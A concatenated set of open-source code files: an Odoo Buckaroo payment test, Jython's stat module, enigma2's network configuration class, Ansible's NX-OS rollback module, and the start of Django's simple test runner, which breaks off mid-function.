@mute_logger('openerp.addons.payment_buckaroo.models.buckaroo', 'ValidationError') def test_20_buckaroo_form_management(self): cr, uid, context = self.cr, self.uid, {} # be sure not to do stupid thing buckaroo = self.payment_acquirer.browse(self.cr, self.uid, self.buckaroo_id, None) 
self.assertEqual(buckaroo.environment, 'test', 'test without test environment') # typical data posted by buckaroo after client has successfully paid buckaroo_post_data = { 'BRQ_RETURNDATA': u'', 'BRQ_AMOUNT': u'2240.00', 'BRQ_CURRENCY': u'EUR', 'BRQ_CUSTOMER_NAME': u'Jan de Tester', 'BRQ_INVOICENUMBER': u'SO004', 'BRQ_PAYMENT': u'573311D081B04069BD6336001611DBD4', 'BRQ_PAYMENT_METHOD': u'paypal', 'BRQ_SERVICE_PAYPAL_PAYERCOUNTRY': u'NL', 'BRQ_SERVICE_PAYPAL_PAYEREMAIL': u'fhe@openerp.com', 'BRQ_SERVICE_PAYPAL_PAYERFIRSTNAME': u'Jan', 'BRQ_SERVICE_PAYPAL_PAYERLASTNAME': u'Tester', 'BRQ_SERVICE_PAYPAL_PAYERMIDDLENAME': u'de', 'BRQ_SERVICE_PAYPAL_PAYERSTATUS': u'verified', 'BRQ_SIGNATURE': u'175d82dd53a02bad393fee32cb1eafa3b6fbbd91', 'BRQ_STATUSCODE': u'190', 'BRQ_STATUSCODE_DETAIL': u'S001', 'BRQ_STATUSMESSAGE': u'Transaction successfully processed', 'BRQ_TEST': u'true', 'BRQ_TIMESTAMP': u'2014-05-08 12:41:21', 'BRQ_TRANSACTIONS': u'D6106678E1D54EEB8093F5B3AC42EA7B', 'BRQ_WEBSITEKEY': u'5xTGyGyPyl', } # should raise error about unknown tx with self.assertRaises(ValidationError): self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) tx_id = self.payment_transaction.create( cr, uid, { 'amount': 2240.0, 'acquirer_id': self.buckaroo_id, 'currency_id': self.currency_euro_id, 'reference': 'SO004', 'partner_name': 'Norbert Buyer', 'partner_country_id': self.country_france_id, }, context=context ) # validate it self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) # check state tx = self.payment_transaction.browse(cr, uid, tx_id, context=context) self.assertEqual(tx.state, 'done', 'Buckaroo: validation did not put tx into done state') self.assertEqual(tx.buckaroo_txnid, buckaroo_post_data.get('BRQ_TRANSACTIONS'), 'Buckaroo: validation did not update tx payid') # reset tx tx.write({'state': 'draft', 'date_validate': False, 'buckaroo_txnid': False}) # now buckaroo post is ok: try to modify 
the SHASIGN buckaroo_post_data['BRQ_SIGNATURE'] = '54d928810e343acf5fb0c3ee75fd747ff159ef7a' with self.assertRaises(ValidationError): self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) # simulate an error buckaroo_post_data['BRQ_STATUSCODE'] = 2 buckaroo_post_data['BRQ_SIGNATURE'] = '4164b52adb1e6a2221d3d8a39d8c3e18a9ecb90b' self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) # check state tx = self.payment_transaction.browse(cr, uid, tx_id, context=context) self.assertEqual(tx.state, 'error', 'Buckaroo: erroneous validation did not put tx into error state')
agpl-3.0
hurricup/intellij-community
python/lib/Lib/stat.py
145
1667
"""Constants/functions for interpreting results of os.stat() and os.lstat(). Suggested usage: from stat import * """ # XXX Strictly spoken, this module may have to be adapted for each POSIX # implementation; in practice, however, the numeric constants used by # stat() are almost universal (even for stat() emulations on non-UNIX # systems like MS-DOS). # Indices for stat struct members in tuple returned by os.stat() ST_MODE = 0 ST_INO = 1 ST_DEV = 2 ST_NLINK = 3 ST_UID = 4 ST_GID = 5 ST_SIZE = 6 ST_ATIME = 7 ST_MTIME = 8 ST_CTIME = 9 # Extract bits from the mode def S_IMODE(mode): return mode & 07777 def S_IFMT(mode): return mode & 0170000 # Constants used as S_IFMT() for various file types # (not all are implemented on all systems) S_IFDIR = 0040000 S_IFCHR = 0020000 S_IFBLK = 0060000 S_IFREG = 0100000 S_IFIFO = 0010000 S_IFLNK = 0120000 S_IFSOCK = 0140000 # Functions to test for each file type def S_ISDIR(mode): return S_IFMT(mode) == S_IFDIR def S_ISCHR(mode): return S_IFMT(mode) == S_IFCHR def S_ISBLK(mode): return S_IFMT(mode) == S_IFBLK def S_ISREG(mode): return S_IFMT(mode) == S_IFREG def S_ISFIFO(mode): return S_IFMT(mode) == S_IFIFO def S_ISLNK(mode): return S_IFMT(mode) == S_IFLNK def S_ISSOCK(mode): return S_IFMT(mode) == S_IFSOCK # Names for permission bits S_ISUID = 04000 S_ISGID = 02000 S_ENFMT = S_ISGID S_ISVTX = 01000 S_IREAD = 00400 S_IWRITE = 00200 S_IEXEC = 00100 S_IRWXU = 00700 S_IRUSR = 00400 S_IWUSR = 00200 S_IXUSR = 00100 S_IRWXG = 00070 S_IRGRP = 00040 S_IWGRP = 00020 S_IXGRP = 00010 S_IRWXO = 00007 S_IROTH = 00004 S_IWOTH = 00002 S_IXOTH = 00001
apache-2.0
aimejeux/enigma2
lib/python/Components/Network.py
2
24018
import os import re from socket import * from Components.Console import Console from Components.PluginComponent import plugins from Plugins.Plugin import PluginDescriptor from boxbranding import getBoxType class Network: def __init__(self): self.ifaces = {} self.configuredNetworkAdapters = [] self.NetworkState = 0 self.DnsState = 0 self.nameservers = [] self.ethtool_bin = "ethtool" self.Console = Console() self.LinkConsole = Console() self.restartConsole = Console() self.deactivateInterfaceConsole = Console() self.activateInterfaceConsole = Console() self.resetNetworkConsole = Console() self.DnsConsole = Console() self.PingConsole = Console() self.config_ready = None self.friendlyNames = {} self.lan_interfaces = [] self.wlan_interfaces = [] self.remoteRootFS = None self.getInterfaces() def onRemoteRootFS(self): if self.remoteRootFS is None: import Harddisk for parts in Harddisk.getProcMounts(): if parts[1] == '/' and parts[2] == 'nfs': self.remoteRootFS = True break else: self.remoteRootFS = False return self.remoteRootFS def isBlacklisted(self, iface): return iface in ('lo', 'wifi0', 'wmaster0', 'sit0', 'tun0') def getInterfaces(self, callback = None): self.configuredInterfaces = [] for device in self.getInstalledAdapters(): self.getAddrInet(device, callback) # helper function def regExpMatch(self, pattern, string): if string is None: return None try: return pattern.search(string).group() except AttributeError: return None # helper function to convert ips from a sring to a list of ints def convertIP(self, ip): return [ int(n) for n in ip.split('.') ] def getAddrInet(self, iface, callback): if not self.Console: self.Console = Console() cmd = "ip -o addr show dev " + iface self.Console.ePopen(cmd, self.IPaddrFinished, [iface,callback]) def IPaddrFinished(self, result, retval, extra_args): (iface, callback ) = extra_args data = { 'up': False, 'dhcp': False, 'preup' : False, 'predown' : False } globalIPpattern = re.compile("scope global") ipRegexp = 
'[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' netRegexp = '[0-9]{1,2}' macRegexp = '[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}' ipLinePattern = re.compile('inet ' + ipRegexp + '/') ipPattern = re.compile(ipRegexp) netmaskLinePattern = re.compile('/' + netRegexp) netmaskPattern = re.compile(netRegexp) bcastLinePattern = re.compile(' brd ' + ipRegexp) upPattern = re.compile('UP') macPattern = re.compile(macRegexp) macLinePattern = re.compile('link/ether ' + macRegexp) for line in result.splitlines(): split = line.strip().split(' ',2) if split[1][:-1] == iface: up = self.regExpMatch(upPattern, split[2]) mac = self.regExpMatch(macPattern, self.regExpMatch(macLinePattern, split[2])) if up is not None: data['up'] = True if iface is not 'lo': self.configuredInterfaces.append(iface) if mac is not None: data['mac'] = mac if split[1] == iface: if re.search(globalIPpattern, split[2]): ip = self.regExpMatch(ipPattern, self.regExpMatch(ipLinePattern, split[2])) netmask = self.calc_netmask(self.regExpMatch(netmaskPattern, self.regExpMatch(netmaskLinePattern, split[2]))) bcast = self.regExpMatch(ipPattern, self.regExpMatch(bcastLinePattern, split[2])) if ip is not None: data['ip'] = self.convertIP(ip) if netmask is not None: data['netmask'] = self.convertIP(netmask) if bcast is not None: data['bcast'] = self.convertIP(bcast) if not data.has_key('ip'): data['dhcp'] = True data['ip'] = [0, 0, 0, 0] data['netmask'] = [0, 0, 0, 0] data['gateway'] = [0, 0, 0, 0] cmd = "route -n | grep " + iface self.Console.ePopen(cmd,self.routeFinished, [iface, data, callback]) def routeFinished(self, result, retval, extra_args): (iface, data, callback) = extra_args ipRegexp = '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' ipPattern = re.compile(ipRegexp) ipLinePattern = re.compile(ipRegexp) for line in result.splitlines(): print line[0:7] if line[0:7] == "0.0.0.0": gateway = self.regExpMatch(ipPattern, line[16:31]) if gateway: data['gateway'] 
= self.convertIP(gateway) self.ifaces[iface] = data self.loadNetworkConfig(iface,callback) def writeNetworkConfig(self): self.configuredInterfaces = [] fp = file('/etc/network/interfaces', 'w') fp.write("# automatically generated by enigma2\n# do NOT change manually!\n\n") fp.write("auto lo\n") fp.write("iface lo inet loopback\n\n") for ifacename, iface in self.ifaces.items(): if iface['up']: fp.write("auto " + ifacename + "\n") self.configuredInterfaces.append(ifacename) if iface['dhcp']: fp.write("iface "+ ifacename +" inet dhcp\n") fp.write(" hostname $(hostname)\n") if not iface['dhcp']: fp.write("iface "+ ifacename +" inet static\n") fp.write(" hostname $(hostname)\n") if iface.has_key('ip'): # print tuple(iface['ip']) fp.write(" address %d.%d.%d.%d\n" % tuple(iface['ip'])) fp.write(" netmask %d.%d.%d.%d\n" % tuple(iface['netmask'])) if iface.has_key('gateway'): fp.write(" gateway %d.%d.%d.%d\n" % tuple(iface['gateway'])) if iface.has_key("configStrings"): fp.write(iface["configStrings"]) if iface["preup"] is not False and not iface.has_key("configStrings"): fp.write(iface["preup"]) if iface["predown"] is not False and not iface.has_key("configStrings"): fp.write(iface["predown"]) fp.write("\n") fp.close() self.configuredNetworkAdapters = self.configuredInterfaces self.writeNameserverConfig() def writeNameserverConfig(self): try: os.system('rm -rf /etc/resolv.conf') fp = file('/etc/resolv.conf', 'w') for nameserver in self.nameservers: fp.write("nameserver %d.%d.%d.%d\n" % tuple(nameserver)) fp.close() except: print "[Network.py] interfaces - resolv.conf write failed" def loadNetworkConfig(self,iface,callback = None): interfaces = [] # parse the interfaces-file try: fp = file('/etc/network/interfaces', 'r') interfaces = fp.readlines() fp.close() except: print "[Network.py] interfaces - opening failed" ifaces = {} currif = "" for i in interfaces: split = i.strip().split(' ') if split[0] == "iface": currif = split[1] ifaces[currif] = {} if len(split) == 4 and 
split[3] == "dhcp": ifaces[currif]["dhcp"] = True else: ifaces[currif]["dhcp"] = False if currif == iface: #read information only for available interfaces if split[0] == "address": ifaces[currif]["address"] = map(int, split[1].split('.')) if self.ifaces[currif].has_key("ip"): if self.ifaces[currif]["ip"] != ifaces[currif]["address"] and ifaces[currif]["dhcp"] == False: self.ifaces[currif]["ip"] = map(int, split[1].split('.')) if split[0] == "netmask": ifaces[currif]["netmask"] = map(int, split[1].split('.')) if self.ifaces[currif].has_key("netmask"): if self.ifaces[currif]["netmask"] != ifaces[currif]["netmask"] and ifaces[currif]["dhcp"] == False: self.ifaces[currif]["netmask"] = map(int, split[1].split('.')) if split[0] == "gateway": ifaces[currif]["gateway"] = map(int, split[1].split('.')) if self.ifaces[currif].has_key("gateway"): if self.ifaces[currif]["gateway"] != ifaces[currif]["gateway"] and ifaces[currif]["dhcp"] == False: self.ifaces[currif]["gateway"] = map(int, split[1].split('.')) if split[0] == "pre-up": if self.ifaces[currif].has_key("preup"): self.ifaces[currif]["preup"] = i if split[0] in ("pre-down","post-down"): if self.ifaces[currif].has_key("predown"): self.ifaces[currif]["predown"] = i for ifacename, iface in ifaces.items(): if self.ifaces.has_key(ifacename): self.ifaces[ifacename]["dhcp"] = iface["dhcp"] if self.Console: if len(self.Console.appContainers) == 0: # save configured interfacelist self.configuredNetworkAdapters = self.configuredInterfaces # load ns only once self.loadNameserverConfig() # print "read configured interface:", ifaces # print "self.ifaces after loading:", self.ifaces self.config_ready = True self.msgPlugins() if callback is not None: callback(True) def loadNameserverConfig(self): ipRegexp = "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" nameserverPattern = re.compile("nameserver +" + ipRegexp) ipPattern = re.compile(ipRegexp) resolv = [] try: fp = file('/etc/resolv.conf', 'r') resolv = fp.readlines() fp.close() 
self.nameservers = [] except: print "[Network.py] resolv.conf - opening failed" for line in resolv: if self.regExpMatch(nameserverPattern, line) is not None: ip = self.regExpMatch(ipPattern, line) if ip: self.nameservers.append(self.convertIP(ip)) # print "nameservers:", self.nameservers def getInstalledAdapters(self): return [x for x in os.listdir('/sys/class/net') if not self.isBlacklisted(x)] def getConfiguredAdapters(self): return self.configuredNetworkAdapters def getNumberOfAdapters(self): return len(self.ifaces) def getFriendlyAdapterName(self, x): if x in self.friendlyNames.keys(): return self.friendlyNames.get(x, x) self.friendlyNames[x] = self.getFriendlyAdapterNaming(x) return self.friendlyNames.get(x, x) # when we have no friendly name, use adapter name def getFriendlyAdapterNaming(self, iface): name = None if self.isWirelessInterface(iface): if iface not in self.wlan_interfaces: name = _("WLAN connection") if len(self.wlan_interfaces): name += " " + str(len(self.wlan_interfaces)+1) self.wlan_interfaces.append(iface) else: if iface not in self.lan_interfaces: if getBoxType() == "et10000" and iface == "eth1": name = _("VLAN connection") else: name = _("LAN connection") if len(self.lan_interfaces) and not getBoxType() == "et10000" and not iface == "eth1": name += " " + str(len(self.lan_interfaces)+1) self.lan_interfaces.append(iface) return name def getFriendlyAdapterDescription(self, iface): if not self.isWirelessInterface(iface): return _('Ethernet network interface') moduledir = self.getWlanModuleDir(iface) if moduledir: name = os.path.basename(os.path.realpath(moduledir)) if name in ('ath_pci','ath5k'): name = 'Atheros' elif name in ('rt73','rt73usb','rt3070sta'): name = 'Ralink' elif name == 'zd1211b': name = 'Zydas' elif name == 'r871x_usb_drv': name = 'Realtek' else: name = _('Unknown') return name + ' ' + _('wireless network interface') def getAdapterName(self, iface): return iface def getAdapterList(self): return self.ifaces.keys() def 
getAdapterAttribute(self, iface, attribute): if self.ifaces.has_key(iface): if self.ifaces[iface].has_key(attribute): return self.ifaces[iface][attribute] return None def setAdapterAttribute(self, iface, attribute, value): # print "setting for adapter", iface, "attribute", attribute, " to value", value if self.ifaces.has_key(iface): self.ifaces[iface][attribute] = value def removeAdapterAttribute(self, iface, attribute): if self.ifaces.has_key(iface): if self.ifaces[iface].has_key(attribute): del self.ifaces[iface][attribute] def getNameserverList(self): if len(self.nameservers) == 0: return [[0, 0, 0, 0], [0, 0, 0, 0]] else: return self.nameservers def clearNameservers(self): self.nameservers = [] def addNameserver(self, nameserver): if nameserver not in self.nameservers: self.nameservers.append(nameserver) def removeNameserver(self, nameserver): if nameserver in self.nameservers: self.nameservers.remove(nameserver) def changeNameserver(self, oldnameserver, newnameserver): if oldnameserver in self.nameservers: for i in range(len(self.nameservers)): if self.nameservers[i] == oldnameserver: self.nameservers[i] = newnameserver def resetNetworkConfig(self, mode='lan', callback = None): self.resetNetworkConsole = Console() self.commands = [] self.commands.append("/etc/init.d/avahi-daemon stop") for iface in self.ifaces.keys(): if iface != 'eth0' or not self.onRemoteRootFS(): self.commands.append("ip addr flush dev " + iface) self.commands.append("/etc/init.d/networking stop") self.commands.append("killall -9 udhcpc") self.commands.append("rm /var/run/udhcpc*") self.resetNetworkConsole.eBatch(self.commands, self.resetNetworkFinishedCB, [mode, callback], debug=True) def resetNetworkFinishedCB(self, extra_args): (mode, callback) = extra_args if len(self.resetNetworkConsole.appContainers) == 0: self.writeDefaultNetworkConfig(mode, callback) def writeDefaultNetworkConfig(self,mode='lan', callback = None): fp = file('/etc/network/interfaces', 'w') fp.write("# automatically 
generated by enigma2\n# do NOT change manually!\n\n") fp.write("auto lo\n") fp.write("iface lo inet loopback\n\n") if mode == 'wlan': fp.write("auto wlan0\n") fp.write("iface wlan0 inet dhcp\n") if mode == 'wlan-mpci': fp.write("auto ath0\n") fp.write("iface ath0 inet dhcp\n") if mode == 'lan': fp.write("auto eth0\n") fp.write("iface eth0 inet dhcp\n") fp.write("\n") fp.close() self.resetNetworkConsole = Console() self.commands = [] if mode == 'wlan': self.commands.append("ifconfig eth0 down") self.commands.append("ifconfig ath0 down") self.commands.append("ifconfig wlan0 up") if mode == 'wlan-mpci': self.commands.append("ifconfig eth0 down") self.commands.append("ifconfig wlan0 down") self.commands.append("ifconfig ath0 up") if mode == 'lan': self.commands.append("ifconfig eth0 up") self.commands.append("ifconfig wlan0 down") self.commands.append("ifconfig ath0 down") self.commands.append("/etc/init.d/avahi-daemon start") self.resetNetworkConsole.eBatch(self.commands, self.resetNetworkFinished, [mode,callback], debug=True) def resetNetworkFinished(self,extra_args): (mode, callback) = extra_args if len(self.resetNetworkConsole.appContainers) == 0: if callback is not None: callback(True,mode) def checkNetworkState(self,statecallback): self.NetworkState = 0 cmd1 = "ping -c 1 www.google.de" cmd2 = "ping -c 1 www.google.com" cmd3 = "ping -c 1 www.google.nl" self.PingConsole = Console() self.PingConsole.ePopen(cmd1, self.checkNetworkStateFinished,statecallback) self.PingConsole.ePopen(cmd2, self.checkNetworkStateFinished,statecallback) self.PingConsole.ePopen(cmd3, self.checkNetworkStateFinished,statecallback) def checkNetworkStateFinished(self, result, retval,extra_args): (statecallback) = extra_args if self.PingConsole is not None: if retval == 0: self.PingConsole = None statecallback(self.NetworkState) else: self.NetworkState += 1 if len(self.PingConsole.appContainers) == 0: statecallback(self.NetworkState) def restartNetwork(self,callback = None): 
self.restartConsole = Console() self.config_ready = False self.msgPlugins() self.commands = [] self.commands.append("/etc/init.d/avahi-daemon stop") for iface in self.ifaces.keys(): if iface != 'eth0' or not self.onRemoteRootFS(): self.commands.append("ifdown " + iface) self.commands.append("ip addr flush dev " + iface) self.commands.append("/etc/init.d/networking stop") self.commands.append("killall -9 udhcpc") self.commands.append("rm /var/run/udhcpc*") self.commands.append("/etc/init.d/networking start") self.commands.append("/etc/init.d/avahi-daemon start") self.restartConsole.eBatch(self.commands, self.restartNetworkFinished, callback, debug=True) def restartNetworkFinished(self,extra_args): ( callback ) = extra_args if callback is not None: callback(True) def getLinkState(self,iface,callback): cmd = self.ethtool_bin + " " + iface self.LinkConsole = Console() self.LinkConsole.ePopen(cmd, self.getLinkStateFinished,callback) def getLinkStateFinished(self, result, retval,extra_args): (callback) = extra_args if self.LinkConsole is not None: if len(self.LinkConsole.appContainers) == 0: callback(result) def stopPingConsole(self): if self.PingConsole is not None: if len(self.PingConsole.appContainers): for name in self.PingConsole.appContainers.keys(): self.PingConsole.kill(name) def stopLinkStateConsole(self): if self.LinkConsole is not None: if len(self.LinkConsole.appContainers): for name in self.LinkConsole.appContainers.keys(): self.LinkConsole.kill(name) def stopDNSConsole(self): if self.DnsConsole is not None: if len(self.DnsConsole.appContainers): for name in self.DnsConsole.appContainers.keys(): self.DnsConsole.kill(name) def stopRestartConsole(self): if self.restartConsole is not None: if len(self.restartConsole.appContainers): for name in self.restartConsole.appContainers.keys(): self.restartConsole.kill(name) def stopGetInterfacesConsole(self): if self.Console is not None: if len(self.Console.appContainers): for name in self.Console.appContainers.keys(): 
self.Console.kill(name) def stopDeactivateInterfaceConsole(self): if self.deactivateInterfaceConsole is not None: self.deactivateInterfaceConsole.killAll() self.deactivateInterfaceConsole = None def stopActivateInterfaceConsole(self): if self.activateInterfaceConsole is not None: self.activateInterfaceConsole.killAll() self.activateInterfaceConsole = None def checkforInterface(self,iface): if self.getAdapterAttribute(iface, 'up') is True: return True else: ret=os.system("ifconfig " + iface + " up") os.system("ifconfig " + iface + " down") if ret == 0: return True else: return False def checkDNSLookup(self,statecallback): cmd1 = "nslookup www.dream-multimedia-tv.de" cmd2 = "nslookup www.heise.de" cmd3 = "nslookup www.google.de" self.DnsConsole = Console() self.DnsConsole.ePopen(cmd1, self.checkDNSLookupFinished,statecallback) self.DnsConsole.ePopen(cmd2, self.checkDNSLookupFinished,statecallback) self.DnsConsole.ePopen(cmd3, self.checkDNSLookupFinished,statecallback) def checkDNSLookupFinished(self, result, retval,extra_args): (statecallback) = extra_args if self.DnsConsole is not None: if retval == 0: self.DnsConsole = None statecallback(self.DnsState) else: self.DnsState += 1 if len(self.DnsConsole.appContainers) == 0: statecallback(self.DnsState) def deactivateInterface(self,ifaces,callback = None): self.config_ready = False self.msgPlugins() commands = [] def buildCommands(iface): commands.append("ifdown " + iface) commands.append("ip addr flush dev " + iface) #wpa_supplicant sometimes doesn't quit properly on SIGTERM if os.path.exists('/var/run/wpa_supplicant/'+ iface): commands.append("wpa_cli -i" + iface + " terminate") if not self.deactivateInterfaceConsole: self.deactivateInterfaceConsole = Console() if isinstance(ifaces, (list, tuple)): for iface in ifaces: if iface != 'eth0' or not self.onRemoteRootFS(): buildCommands(iface) else: if ifaces == 'eth0' and self.onRemoteRootFS(): if callback is not None: callback(True) return buildCommands(ifaces) 
self.deactivateInterfaceConsole.eBatch(commands, self.deactivateInterfaceFinished, [ifaces,callback], debug=True) def deactivateInterfaceFinished(self,extra_args): (ifaces, callback) = extra_args def checkCommandResult(iface): if self.deactivateInterfaceConsole and self.deactivateInterfaceConsole.appResults.has_key("ifdown " + iface): result = str(self.deactivateInterfaceConsole.appResults.get("ifdown " + iface)).strip("\n") if result == "ifdown: interface " + iface + " not configured": return False else: return True #ifdown sometimes can't get the interface down. if isinstance(ifaces, (list, tuple)): for iface in ifaces: if checkCommandResult(iface) is False: Console().ePopen(("ifconfig " + iface + " down" )) else: if checkCommandResult(ifaces) is False: Console().ePopen(("ifconfig " + ifaces + " down" )) if self.deactivateInterfaceConsole: if len(self.deactivateInterfaceConsole.appContainers) == 0: if callback is not None: callback(True) def activateInterface(self,iface,callback = None): if self.config_ready: self.config_ready = False self.msgPlugins() if iface == 'eth0' and self.onRemoteRootFS(): if callback is not None: callback(True) return if not self.activateInterfaceConsole: self.activateInterfaceConsole = Console() commands = ["ifup " + iface] self.activateInterfaceConsole.eBatch(commands, self.activateInterfaceFinished, callback, debug=True) def activateInterfaceFinished(self,extra_args): callback = extra_args if self.activateInterfaceConsole: if len(self.activateInterfaceConsole.appContainers) == 0: if callback is not None: callback(True) def sysfsPath(self, iface): return '/sys/class/net/' + iface def isWirelessInterface(self, iface): if iface in self.wlan_interfaces: return True if os.path.isdir(self.sysfsPath(iface) + '/wireless'): return True # r871x_usb_drv on kernel 2.6.12 is not identifiable over /sys/class/net/'ifacename'/wireless so look also inside /proc/net/wireless device = re.compile('[a-z]{2,}[0-9]*:') ifnames = [] fp = 
open('/proc/net/wireless', 'r') for line in fp: try: ifnames.append(device.search(line).group()[:-1]) except AttributeError: pass fp.close() if iface in ifnames: return True return False def getWlanModuleDir(self, iface = None): devicedir = self.sysfsPath(iface) + '/device' moduledir = devicedir + '/driver/module' if os.path.isdir(moduledir): return moduledir # identification is not possible over default moduledir for x in os.listdir(devicedir): # rt3070 on kernel 2.6.18 registers wireless devices as usb_device (e.g. 1-1.3:1.0) and identification is only possible over /sys/class/net/'ifacename'/device/1-xxx if x.startswith("1-"): moduledir = devicedir + '/' + x + '/driver/module' if os.path.isdir(moduledir): return moduledir # rt73, zd1211b, r871x_usb_drv on kernel 2.6.12 can be identified over /sys/class/net/'ifacename'/device/driver, so look also here moduledir = devicedir + '/driver' if os.path.isdir(moduledir): return moduledir return None def detectWlanModule(self, iface = None): if not self.isWirelessInterface(iface): return None devicedir = self.sysfsPath(iface) + '/device' if os.path.isdir(devicedir + '/ieee80211'): return 'nl80211' moduledir = self.getWlanModuleDir(iface) if moduledir: module = os.path.basename(os.path.realpath(moduledir)) if module in ('ath_pci','ath5k'): return 'madwifi' if module in ('rt73','rt73'): return 'ralink' if module == 'zd1211b': return 'zydas' return 'wext' def calc_netmask(self,nmask): from struct import pack, unpack from socket import inet_ntoa, inet_aton mask = 1L<<31 xnet = (1L<<32)-1 cidr_range = range(0, 32) cidr = long(nmask) if cidr not in cidr_range: print 'cidr invalid: %d' % cidr return None else: nm = ((1L<<cidr)-1)<<(32-cidr) netmask = str(inet_ntoa(pack('>L', nm))) return netmask def msgPlugins(self): if self.config_ready is not None: for p in plugins.getPlugins(PluginDescriptor.WHERE_NETWORKCONFIG_READ): p(reason=self.config_ready) def hotplug(self, event): interface = event['INTERFACE'] if 
self.isBlacklisted(interface): return action = event['ACTION'] if action == "add": print "[Network] Add new interface:", interface self.getAddrInet(interface, None) elif action == "remove": print "[Network] Removed interface:", interface try: del self.ifaces[interface] except KeyError: pass iNetwork = Network() def InitNetwork(): pass
gpl-2.0
vaygr/ansible
lib/ansible/modules/network/nxos/nxos_rollback.py
50
3790
#!/usr/bin/python # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'network'} DOCUMENTATION = ''' --- module: nxos_rollback extends_documentation_fragment: nxos version_added: "2.2" short_description: Set a checkpoint or rollback to a checkpoint. description: - This module offers the ability to set a configuration checkpoint file or rollback to a configuration checkpoint file on Cisco NXOS switches. author: - Jason Edelman (@jedelman8) - Gabriele Gerbino (@GGabriele) notes: - Tested against NXOSv 7.3.(0)D1(1) on VIRL - Sometimes C(transport=nxapi) may cause a timeout error. options: checkpoint_file: description: - Name of checkpoint file to create. Mutually exclusive with rollback_to. rollback_to: description: - Name of checkpoint file to rollback to. Mutually exclusive with checkpoint_file. ''' EXAMPLES = ''' - nxos_rollback: checkpoint_file: backup.cfg username: "{{ un }}" password: "{{ pwd }}" host: "{{ inventory_hostname }}" - nxos_rollback: rollback_to: backup.cfg username: "{{ un }}" password: "{{ pwd }}" host: "{{ inventory_hostname }}" ''' RETURN = ''' filename: description: The filename of the checkpoint/rollback file. returned: success type: string sample: 'backup.cfg' status: description: Which operation took place and whether it was successful. 
returned: success type: string sample: 'rollback executed' ''' from ansible.module_utils.network.nxos.nxos import nxos_argument_spec, run_commands from ansible.module_utils.basic import AnsibleModule def checkpoint(filename, module): commands = [{ 'command': 'terminal dont-ask', 'output': 'text', }, { 'command': 'checkpoint file %s' % filename, 'output': 'text', }] run_commands(module, commands) def rollback(filename, module): commands = [{ 'command': 'rollback running-config file %s' % filename, 'output': 'text', }] run_commands(module, commands) def main(): argument_spec = dict( checkpoint_file=dict(required=False), rollback_to=dict(required=False) ) argument_spec.update(nxos_argument_spec) module = AnsibleModule(argument_spec=argument_spec, mutually_exclusive=[['checkpoint_file', 'rollback_to']], supports_check_mode=False) checkpoint_file = module.params['checkpoint_file'] rollback_to = module.params['rollback_to'] status = None filename = None changed = False if checkpoint_file: checkpoint(checkpoint_file, module) status = 'checkpoint file created' elif rollback_to: rollback(rollback_to, module) status = 'rollback executed' changed = True filename = rollback_to or checkpoint_file module.exit_json(changed=changed, status=status, filename=filename) if __name__ == '__main__': main()
gpl-3.0
theicfire/djangofun
django/test/simple.py
150
15012
"""
Django's "simple" test runner.

Discovers unittests and doctests in each installed app's ``models`` and
``tests`` modules, builds them into a single suite, creates the test
databases (honoring TEST_MIRROR and TEST_DEPENDENCIES), runs the suite,
and tears everything down again.
"""
import unittest as real_unittest

from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db.models import get_app, get_apps
from django.test import _doctest as doctest
from django.test.utils import setup_test_environment, teardown_test_environment
from django.test.testcases import OutputChecker, DocTestRunner, TestCase
from django.utils import unittest

# ``all`` is a builtin only on Python >= 2.5; fall back to Django's shim.
try:
    all
except NameError:
    from django.utils.itercompat import all


__all__ = ('DjangoTestRunner', 'DjangoTestSuiteRunner', 'run_tests')

# The module name for tests outside models.py
TEST_MODULE = 'tests'

# Shared doctest output checker (normalizes expected-vs-actual output).
doctestOutputChecker = OutputChecker()


class DjangoTestRunner(unittest.TextTestRunner):
    """Deprecated alias for ``unittest.TextTestRunner``.

    Kept only so existing imports keep working; emits a deprecation
    warning on instantiation.
    """

    def __init__(self, *args, **kwargs):
        import warnings
        warnings.warn(
            "DjangoTestRunner is deprecated; it's functionality is indistinguishable from TextTestRunner",
            PendingDeprecationWarning
        )
        super(DjangoTestRunner, self).__init__(*args, **kwargs)


def get_tests(app_module):
    """Return the app's ``tests`` module, or None if it doesn't exist.

    An ImportError raised *inside* an existing tests module is re-raised
    rather than being mistaken for a missing module.
    """
    try:
        app_path = app_module.__name__.split('.')[:-1]
        test_module = __import__('.'.join(app_path + [TEST_MODULE]), {}, {}, TEST_MODULE)
    except ImportError, e:
        # Couldn't import tests.py. Was it due to a missing file, or
        # due to an import error in a tests.py that actually exists?
        import os.path
        from imp import find_module
        try:
            mod = find_module(TEST_MODULE, [os.path.dirname(app_module.__file__)])
        except ImportError:
            # 'tests' module doesn't exist. Move on.
            test_module = None
        else:
            # The module exists, so there must be an import error in the
            # test module itself. We don't need the module; so if the
            # module was a single file module (i.e., tests.py), close the file
            # handle returned by find_module. Otherwise, the test module
            # is a directory, and there is nothing to close.
            if mod[0]:
                mod[0].close()
            raise
    return test_module


def build_suite(app_module):
    "Create a complete Django test suite for the provided application module"
    suite = unittest.TestSuite()

    # Load unit and doctests in the models.py module. If module has
    # a suite() method, use it. Otherwise build the test suite ourselves.
    if hasattr(app_module, 'suite'):
        suite.addTest(app_module.suite())
    else:
